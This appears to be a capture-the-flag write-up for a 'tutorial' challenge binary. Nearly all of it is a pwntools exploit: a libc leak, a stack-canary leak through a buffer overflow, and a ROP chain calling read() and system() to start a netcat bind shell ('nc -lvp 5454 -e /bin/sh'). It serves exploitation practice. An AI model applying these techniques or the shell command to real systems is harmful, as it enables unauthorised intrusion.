The challenge imposes many constraints, so you have to locate those conditions in IDA and satisfy them before the binary will run normally.


from pwn import *

r = remote("localhost", 9797)
libc_elf = ELF("./libc-2.19.so")
elf = ELF("./tutorial")

read_plt = elf.plt['read']
bss = elf.bss()
# Command that the last stage reads into .bss and hands to system()
cmd = b"nc -lvp 5454 -e /bin/sh\x00"

# Menu option 1 prints a libc address after "Reference:". The script treats
# leak + 1280 as puts() and derives system() from the libc-2.19 offset.
r.sendlineafter(b">", b"1")
r.recvuntil(b"Reference:")

libc_puts = int(r.recv(14), 16) + 1280
libc_system = libc_puts - 0x2a300
log.info("libc_puts = {}".format(hex(libc_puts)))
log.info("libc_system = {}".format(hex(libc_system)))

# ROP gadgets at fixed offsets from the leaked puts() address
pop_rdi = libc_puts + 0x12e515
pop_rsi = libc_puts + 0xcd587
pop_rdx = libc_puts - 0x6dafe

# Menu option 2: 311 'A' plus the newline from sendline fill the 312-byte
# buffer, so the echoed output continues straight into the stack canary.
r.sendlineafter(b">", b"2")

payload = b"A" * 311
r.sendlineafter(b"Time to test your exploit...", payload)

r.recvuntil(b"A\x0a")
canary = u64(r.recv(8))
log.info("canary = {}".format(hex(canary)))

# Second overflow: restore the canary, skip saved rbp, then the ROP chain
# read(4, bss, 30) followed by system(bss).
r.sendlineafter(b">", b"2")
payload = b"\x90" * 312
payload += p64(canary)
payload += b"\x90" * 8      # saved rbp

payload += p64(pop_rdi)
payload += p64(4)           # fd
payload += p64(pop_rsi)
payload += p64(bss)         # buf
payload += p64(pop_rdx)
payload += p64(30)          # len
payload += p64(read_plt)

payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(libc_system)
pause()
r.sendlineafter(b">", payload)
pause()
r.sendline(cmd)             # consumed by the read() in the chain